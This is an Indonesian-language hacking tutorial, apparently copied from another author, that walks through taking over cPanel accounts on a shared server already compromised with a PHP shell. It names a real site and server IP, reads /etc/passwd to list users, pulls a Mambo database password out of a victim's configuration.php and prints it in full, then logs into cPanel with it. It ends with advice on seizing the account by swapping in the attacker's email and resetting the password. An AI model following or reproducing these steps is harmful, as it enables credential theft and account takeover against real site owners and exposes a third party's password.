pertama kita buka phpshell ato target injek kita …
saya ambil contoh utk site ini

http://www.abm.no/

langkah pertama :

cat /etc/passwd <— guna nya buat tau jumlah user yg ada disana ….

contoh :

lagerhus:x:32050:32051::/home/lagerhus:/usr/local/cpanel/bin/jailshell
ltngrupp:x:32051:32052::/home/ltngrupp:/usr/local/cpanel/bin/jailshell
melodin:x:32054:32055::/home/melodin:/usr/local/cpanel/bin/jailshell
monalisa:x:32055:32056::/home/monalisa:/usr/local/cpanel/bin/jailshell
sandvika:x:32056:32057::/home/sandvika:/usr/local/cpanel/bin/jailshell
storvilt:x:32057:32058::/home/storvilt:/usr/local/cpanel/bin/jailshell
supercup:x:32058:32059::/home/supercup:/usr/local/cpanel/bin/jailshell

ok …

langkah kedua ….
pilih salah satu user …

contoh :
/home/monalisa <– aku pilih ini …
dan masuk ke folder public_html …

/home/monalisa/public_html

langkah ke tiga coba kalian ls -al dan perhatikan saut2 nama file itu

contoh:
ls -al dari /home/monalisa/public_html

344337 drwxr-x— 27 monalisa nobody 4096 Aug 29 09:31 .
5718289 drwx–x–x 11 monalisa monalisa 4096 Aug 29 09:53 ..
344348 -rw-r–r– 1 monalisa monalisa 690 May 11 02:14 .htaccess
344088 -rwxr-xr-x 1 monalisa monalisa 56216 Feb 26 2006 CHANGELOG.php
344354 -rwxr-xr-x 1 monalisa monalisa 3429 Feb 26 2006 COPYRIGHT.php
344351 -rwxrwxrwx 1 monalisa monalisa 1122 Jul 20 18:18 INSTALL.php
344342 -rwxrwxrwx 1 monalisa monalisa 17977 Sep 17 2005 LICENSE.php
10240263 drwxrwxrwx 9 monalisa monalisa 4096 Dec 15 2005 administrator
4194486 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 bancorotto
8176127 drwxr-xr-x 9 monalisa monalisa 4096 Mar 24 14:00 bilder
9846992 drwxrwxrwx 2 monalisa monalisa 4096 Dec 21 2005 bilder_old
4194627 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 byrakrat
32993 drwxrwxrwx 2 monalisa monalisa 4096 May 30 13:04 cache
4194623 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 cafebeirut
5095694 drwxrwxrwx 2 monalisa monalisa 4096 Oct 1 2005 cgi-bin
180461 drwxrwxrwx 25 monalisa monalisa 4096 May 31 12:00 components
344140 -rwxr-xr-x 1 monalisa monalisa 2852 Jul 25 12:06 configuration.php
344141 -rwxr-xr-x 1 root root 2855 Jul 17 17:52 configuration.php~
4194484 drwxrwxrwx 16 monalisa monalisa 4096 Aug 22 15:18 davinci

dari sini kita bisa liat bahwa user monalisa menggunakan mambo …

langkah ke empat yaitu baca file yg bernama configuration.php ato config.php ato db.php

contoh:
dalam kasus ini file yg ada adalah configuration.php
jadi kita cat configuration.php
hasilnya :

$mosConfig_live_site = ´http://www.monalisahuset.no´;
$mosConfig_locale = ´no_NO´;
$mosConfig_mailer = ´mail´;
$mosConfig_mailfrom = ´post@monalisahuset.no´;
$mosConfig_ml_support = ´0´;
$mosConfig_multipage_toc = ´1´;
$mosConfig_offline = ´0´;
$mosConfig_offline_message = ´This site is down for maintenance.<br /> Please check back again soon.´;
$mosConfig_offset = ´-2´;
$mosConfig_offset_user = ´0´;
$mosConfig_pagetitles = ´1´;
$mosConfig_password = ´jqUf#(l´;

ok dari sini kita bisa mendapat pass dari user tersebut
pass na adalah $mosConfig_password = ´jqUf#(l´;

langkah ke lima mengetahui bagaimana cara utk login ke dalam cpanel ato ssh …

setelah kita mendapat kan passwordnya kita coba utk login ke cpanel nya
caranya ketik /dns <site target> di Mirc

contoh:

[15:02] * Dns resolving http://www.abm.no

[15:02] * Dns resolved http://www.abm.no to 62.70.54.76

dari situ kita mendapat kan ip server 62.70.54.76
utk login cpanel kita bisa menggunakan http://<ip server>:2082
dalam hal ini http://62.70.54.76:2082

setelah itu kita masukan username dan pass ….
utk username kita dapat dari cat /etc/passwd dan dalam kasus ini user yg kita pake adalah monalisa
jadi utk login kita masukan
username:monalisa
password:jqUf#(l

dan anda tlah masuk kedalam cpanel nya …

Note:
1. Tidak smua user mempunyai cpanel ato ssh … ini dapat kita lihat dari cat /etc/passwd
tandanya : /usr/local/cpanel/bin/jailshell <— berarti user ini memiliki cpanel dan shell
tapi jika : /bin/false <– tandanya cpanel nya dia tidak punya ato shellna.

2. Beberapa server sudah mulai pintar menyembunyikan pass mreka … salah satu trik utk medapat kan pass mreka
coba kalian baca index.php ato admin.php disana akan di cantumkan letak dimana user name dan password nya di sembunyikan.

3. satu saran dari saya setelah kmu masuk ke cpanel jgn merubah password mereka tapi rubah aja contact information masukan email kalian disana
dan klo pass udah dirubah tinggal reset password dan pass na akan kekirim ke email kalian

kopi paste aja dari tutornyah kang JAYOES #joeka@allnet